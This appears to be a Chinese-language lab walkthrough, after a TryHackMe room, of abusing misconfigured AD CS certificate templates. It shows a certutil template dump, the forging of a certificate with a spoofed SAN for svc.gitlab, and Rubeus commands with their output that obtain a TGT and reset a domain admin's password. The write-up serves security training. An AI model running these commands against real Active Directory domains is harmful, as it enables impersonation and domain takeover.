  1854. TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;AU)(OA;;CR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;AU)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;LCRPLORC;;;AU)
  1855. Allow Enroll LUNAR\Domain Admins
  1856. Allow Enroll LUNAR\Domain Users
  1857. Allow Enroll LUNAR\Enterprise Admins
  1858. Allow Enroll NT AUTHORITY\Authenticated Users
  1859. Allow Auto-Enroll NT AUTHORITY\Authenticated Users
  1860. Allow Full Control LUNAR\Domain Admins
  1861. Allow Full Control LUNAR\Enterprise Admins
  1862. Allow Full Control LUNAR\Administrator
  1863. Allow Read NT AUTHORITY\Authenticated Users
  1864. TemplatePropExtensions =
  1865. 4 Extensions:
  1866. Extension[0]:
  1867. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 31
  1868. Certificate Template Information
  1869. Template=User Request(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.13950390.3651808)
  1870. Major Version Number=100
  1871. Minor Version Number=10
  1872. Extension[1]:
  1873. 2.5.29.37: Flags = 0, Length = 22
  1874. Enhanced Key Usage
  1875. Client Authentication (1.3.6.1.5.5.7.3.2)
  1876. Secure Email (1.3.6.1.5.5.7.3.4)
  1877. Encrypting File System (1.3.6.1.4.1.311.10.3.4)
  1878. Extension[2]:
  1879. 2.5.29.15: Flags = 1(Critical), Length = 4
  1880. Key Usage
  1881. Digital Signature, Key Encipherment (a0)
  1882. Extension[3]:
  1883. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = 28
  1884. Application Policies
  1885. [1]Application Certificate Policy:
  1886. Policy Identifier=Client Authentication
  1887. [2]Application Certificate Policy:
  1888. Policy Identifier=Secure Email
  1889. [3]Application Certificate Policy:
  1890. Policy Identifier=Encrypting File System
  1891. TemplatePropValidityPeriod = 1 Years
  1892. TemplatePropRenewalPeriod = 6 Weeks
  1893. Template[32]:
  1894. TemplatePropCommonName = UserSignature
  1895. TemplatePropFriendlyName = User Signature Only
  1896. TemplatePropEKUs =
  1897. 2 ObjectIds:
  1898. 1.3.6.1.5.5.7.3.4 Secure Email
  1899. 1.3.6.1.5.5.7.3.2 Client Authentication
  1900. TemplatePropCryptoProviders =
  1901. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1902. 1: Microsoft Base Cryptographic Provider v1.0
  1903. 2: Microsoft Base DSS Cryptographic Provider
  1904. TemplatePropMajorRevision = 4
  1905. TemplatePropDescription = User
  1906. TemplatePropSchemaVersion = 1
  1907. TemplatePropMinorRevision = 1
  1908. TemplatePropRASignatureCount = 0
  1909. TemplatePropMinimumKeySize = 800 (2048)
  1910. TemplatePropOID =
  1911. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.2
  1912. TemplatePropEnrollmentFlags = 20 (32)
  1913. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1914. TemplatePropSubjectNameFlags = a6000000 (-1509949440)
  1915. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  1916. CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)
  1917. CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)
  1918. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  1919. TemplatePropPrivateKeyFlags = 0
  1920. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1921. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1922. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1923. TemplatePropGeneralFlags = 10222 (66082)
  1924. CT_FLAG_ADD_EMAIL -- 2
  1925. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1926. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1927. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1928. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1929. Allow Enroll LUNAR\Domain Admins
  1930. Allow Enroll LUNAR\Domain Users
  1931. Allow Enroll LUNAR\Enterprise Admins
  1932. Allow Full Control LUNAR\Domain Admins
  1933. Allow Full Control LUNAR\Enterprise Admins
  1934. Allow Read NT AUTHORITY\Authenticated Users
  1935. TemplatePropExtensions =
  1936. 3 Extensions:
  1937. Extension[0]:
  1938. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1c
  1939. Certificate Template Name (Certificate Type)
  1940. UserSignature
  1941. Extension[1]:
  1942. 2.5.29.37: Flags = 0, Length = 16
  1943. Enhanced Key Usage
  1944. Secure Email (1.3.6.1.5.5.7.3.4)
  1945. Client Authentication (1.3.6.1.5.5.7.3.2)
  1946. Extension[2]:
  1947. 2.5.29.15: Flags = 1(Critical), Length = 4
  1948. Key Usage
  1949. Digital Signature (80)
  1950. TemplatePropValidityPeriod = 1 Years
  1951. TemplatePropRenewalPeriod = 6 Weeks
  1952. Template[33]:
  1953. TemplatePropCommonName = WebServer
  1954. TemplatePropFriendlyName = Web Server
  1955. TemplatePropEKUs =
  1956. 1 ObjectIds:
  1957. 1.3.6.1.5.5.7.3.1 Server Authentication
  1958. TemplatePropCryptoProviders =
  1959. 0: Microsoft RSA SChannel Cryptographic Provider
  1960. 1: Microsoft DH SChannel Cryptographic Provider
  1961. TemplatePropMajorRevision = 4
  1962. TemplatePropDescription = Computer
  1963. TemplatePropSchemaVersion = 1
  1964. TemplatePropMinorRevision = 1
  1965. TemplatePropRASignatureCount = 0
  1966. TemplatePropMinimumKeySize = 800 (2048)
  1967. TemplatePropOID =
  1968. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.16
  1969. TemplatePropEnrollmentFlags = 0
  1970. TemplatePropSubjectNameFlags = 1
  1971. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1972. TemplatePropPrivateKeyFlags = 0
  1973. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1974. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1975. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1976. TemplatePropGeneralFlags = 10241 (66113)
  1977. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1978. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1979. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1980. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1981. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1982. Allow Enroll LUNAR\Domain Admins
  1983. Allow Enroll LUNAR\Enterprise Admins
  1984. Allow Full Control LUNAR\Domain Admins
  1985. Allow Full Control LUNAR\Enterprise Admins
  1986. Allow Read NT AUTHORITY\Authenticated Users
  1987. TemplatePropExtensions =
  1988. 3 Extensions:
  1989. Extension[0]:
  1990. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 14
  1991. Certificate Template Name (Certificate Type)
  1992. WebServer
  1993. Extension[1]:
  1994. 2.5.29.37: Flags = 0, Length = c
  1995. Enhanced Key Usage
  1996. Server Authentication (1.3.6.1.5.5.7.3.1)
  1997. Extension[2]:
  1998. 2.5.29.15: Flags = 1(Critical), Length = 4
  1999. Key Usage
  2000. Digital Signature, Key Encipherment (a0)
  2001. TemplatePropValidityPeriod = 2 Years
  2002. TemplatePropRenewalPeriod = 6 Weeks
  2003. Template[34]:
  2004. TemplatePropCommonName = Workstation
  2005. TemplatePropFriendlyName = Workstation Authentication
  2006. TemplatePropEKUs =
  2007. 1 ObjectIds:
  2008. 1.3.6.1.5.5.7.3.2 Client Authentication
  2009. TemplatePropCryptoProviders =
  2010. 0: Microsoft RSA SChannel Cryptographic Provider
  2011. TemplatePropMajorRevision = 65 (101)
  2012. TemplatePropDescription = Computer
  2013. TemplatePropSchemaVersion = 2
  2014. TemplatePropMinorRevision = 0
  2015. TemplatePropRASignatureCount = 0
  2016. TemplatePropMinimumKeySize = 800 (2048)
  2017. TemplatePropOID =
  2018. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.30 Workstation Authentication
  2019. TemplatePropV1ApplicationPolicy =
  2020. 1 ObjectIds:
  2021. 1.3.6.1.5.5.7.3.2 Client Authentication
  2022. TemplatePropEnrollmentFlags = 20 (32)
  2023. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  2024. TemplatePropSubjectNameFlags = 8000000 (134217728)
  2025. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  2026. TemplatePropPrivateKeyFlags = 0
  2027. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  2028. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  2029. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  2030. TemplatePropGeneralFlags = 10260 (66144)
  2031. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  2032. CT_FLAG_MACHINE_TYPE -- 40 (64)
  2033. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  2034. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  2035. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DC)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  2036. Allow Enroll LUNAR\Domain Admins
  2037. Allow Enroll LUNAR\Domain Computers
  2038. Allow Enroll LUNAR\Enterprise Admins
  2039. Allow Full Control LUNAR\Domain Admins
  2040. Allow Full Control LUNAR\Enterprise Admins
  2041. Allow Read NT AUTHORITY\Authenticated Users
  2042. TemplatePropExtensions =
  2043. 4 Extensions:
  2044. Extension[0]:
  2045. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  2046. Certificate Template Information
  2047. Template=Workstation Authentication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.30)
  2048. Major Version Number=101
  2049. Minor Version Number=0
  2050. Extension[1]:
  2051. 2.5.29.37: Flags = 0, Length = c
  2052. Enhanced Key Usage
  2053. Client Authentication (1.3.6.1.5.5.7.3.2)
  2054. Extension[2]:
  2055. 2.5.29.15: Flags = 1(Critical), Length = 4
  2056. Key Usage
  2057. Digital Signature, Key Encipherment (a0)
  2058. Extension[3]:
  2059. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = e
  2060. Application Policies
  2061. [1]Application Certificate Policy:
  2062. Policy Identifier=Client Authentication
  2063. TemplatePropValidityPeriod = 1 Years
  2064. TemplatePropRenewalPeriod = 6 Weeks
  2065. CertUtil: -Template command completed successfully.

在每个输出中,每个模板都是使用 Template[X]标识模板

:::color3 我们要选择的特殊模板应该具有以下特性:

  • 我们需要拥有请求证书的相关请求和拥有这些权限的账户的模板
  • 允许客户端身份验证的模板,这意味这我们可以将其应用于 Kerberos 身份验证
  • 允许我们更改 SAN 的模板

:::

:::info

  • Client Authentication - 该证书可用于客户认证
  • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT - 证书模板允许我们指定主题替代名称(SAN
  • CTPRIVATEKEY_FLAG_EXPORTABLE_KEY - 该证书将可与私钥一起导出
  • Certificate Permissions - 我们有使用证书模板的必要权限

:::

参数一: **Relevant Permissions**

我们需要具有 **<font style="color:#DF2A3F;">生成证书</font>**请求的权限才能使漏洞发挥作用,我们需要寻找具有 Allow Enroll__ or Allow Full Control 的权限。

参数二:Client Authentication

一旦我们找到允许我们请求的证书模板,下一步就是寻找具有 Client Authentication __EKU ,此 EKU 意味着该证书可用于 Kerberos 身份验证。 参数三: Client Specifies SAN 最后我们需要验证模板是否运行 <font style="color:rgb(33, 37, 41);">证书客户端</font>指定 SAN, SAN 通常类似于我们要加密的网站 URL,例如: tryhackme.com , 但是,如果我们有能力控制 SAN,我们就可以利用证书为我们选择的任何AD帐户实际生成 kerberos 票证! 我们需要寻找具有 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT — 1 :::danger 当我们找到具有这三个参数的证书模板我们就可以开始攻击 ::: ## 生成恶意证书 我们使用 WIN+R打开 Microsoft 管理控制台。通过在运行窗口中键入mmc来加载控制台:

AD CS - 图8

这将调出 MMC 窗口。在此窗口中,单击 File -> Add/Remove Snap-in… AD CS - 图9 在此窗口中,我们需要添加证书管理单元:

AD CS - 图10

如果您具有管理权限,它会直接添加管理单元,但您会看到下一个提示:

AD CS - 图11

然后我们展开Certificates选项,右键单击Personal,选择All Tasks,然后单击Request New Certificate

AD CS - 图12

对于第一个选项,只需选择Next两次,因为我们使用的是默认 CA,您应该会看到以下显示可用模板的屏幕:

AD CS - 图13

从屏幕上可以看出,我们需要先完成证书的信息,然后才能注册。单击“注册此证书需要更多信息”。链接以启动该过程:

AD CS - 图14

对于此示例,我们将模拟此域中的一位 DA 用户。让我们以svc.gitlab帐户为目标,因为它是一个服务帐户,这意味着可能需要从该帐户进行 Kerberos 身份验证。这个账户的 UPN 是svc.gitlab@lunar.eruca.com使用此信息,我们可以完成证书属性。 首先,我们将Subject name Type 更改为Common Name并为该证书提供我们想要的名称。然后,我们将替代名称类型更改为用户主体名称,并提供我们要模拟的帐户的 UPN。这些值应如下所示:

AD CS - 图15

然后我们可以将这些属性添加到我们的证书中:

AD CS - 图16

当我们单击确定时,我们现在将看到我们被允许注册此证书:

AD CS - 图17

完成证书的注册。注册后,您将能够在您的个人证书下查看证书:

AD CS - 图18

如果我们查看证书的详细信息,您会看到 SAN 现在指定了我们要模拟的 UPN,绝对不是我们 Web 服务器的 SAN!

AD CS - 图19

现在我们就生成了一个证书,最后一步是实际导出证书以准备使用。右键单击证书,选择所有任务,然后选择导出

AD CS - 图20

按照提示进行操作,但也要确保导出私钥:

AD CS - 图21

证书应为 pfx 格式。此外,为证书配置密码以确保导出私钥:

AD CS - 图22

选择文件名并导出证书:

AD CS - 图23

通过证书模拟账户

现在我们就可以模拟用户了

我们将使用 Rubeus来请求 TGT :

 C:\THMTools> .\Rubeus.exe asktgt /user:svc.gitlab /enctype:aes256 /certificate:vulncert.pfx /password:tryhackme /outfile:svc.gitlab.kirbi /domain:lunar.eruca.com /dc:10.10.69.219         _

_____        _
         (_____ \      | |
          _____) )_   _| |__  _____ _   _  ___
         |  __  /| | | |  _ \| ___ | | | |/___)
         | |  \ \| |_| | |_) ) ____| |_| |___ |
         |_|   |_|____/|____/|_____)____/(___/

         v2.0.0

       [*] Action: Ask TGT

       [*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=vulncert
       [*] Building AS-REQ (w/ PKINIT preauth) for: 'lunar.eruca.com\svc.gitlab'
       [+] TGT request successful!
       [*] base64(ticket.kirbi):

             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

         ServiceName              :  krbtgt/lunar.eruca.com
         ServiceRealm             :  LUNAR.ERUCA.COM
         UserName                 :  svc.gitlab
         UserRealm                :  LUNAR.ERUCA.COM
         StartTime                :  2/6/2022 5:54:46 PM
         EndTime                  :  2/7/2022 3:54:46 AM
         RenewTill                :  2/13/2022 5:54:46 PM
         Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
         KeyType                  :  aes256_cts_hmac_sha1
         Base64(key)              :  Qr+FUX+/G2jHgAR2ssW11+lhaPlB6dMD8V5/rENwJVU=
         ASREP (key)              :  BF2483247FA4CB89DA0417DFEC7FC57C79170BAB55497E0C45F19D976FD617ED
我们现在需要使用此TGT来获得访问权限。我们再次使用 <font style="color:rgb(33, 37, 41);">Rubeus</font>,我们将使用此票证来修改以为域管理员密码:
C:\THMTools> .\Rubeus.exe changepw /ticket:svc.gitlab.kirbi /new:Tryhackme! /dc:LUNDC.lunar.eruca.com /targetuser:lunar.eruca.com\da-nread
           ______        _
          (_____ \      | |
           _____) )_   _| |__  _____ _   _  ___
          |  __  /| | | |  _ \| ___ | | | |/___)
          | |  \ \| |_| | |_) ) ____| |_| |___ |
          |_|   |_|____/|____/|_____)____/(___/

          v2.0.0

        [*] Action: Reset User Password (AoratoPw)

        [*] Using domain controller: LUNDC.lunar.eruca.com (10.10.69.219)
        [*] Resetting password for target user: lunar.eruca.com\da-nread
        [*] New password value: Tryhackme!
        [*] Building AP-REQ for the MS Kpassword request
        [*] Building Authenticator with encryption key type: aes256_cts_hmac_sha1
        [*] base64(session subkey): UP+L2OgmJ281TkkXYNKR0ahLJni1fIk/XMBFwwNTP7Q=
        [*] Building the KRV-PRIV structure
        [+] Password change success!

然后我们可以打开一个 cmd.exe 打开一个命令窗口:

C:\THMTools>runas /user:lunar.eruca.com\da-nread cmd.exe
Enter the password for lunar.eruca.com\da-nread: Tryhackme!
Attempting to start cmd.exe as user "lunar.eruca.com\da-nread" ...

工具

我们可以使用下面这个工具协助操作:

GitHub - GhostPack/PSPKIAudit: PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.

参考

TryHackMe | AD Certificate Templates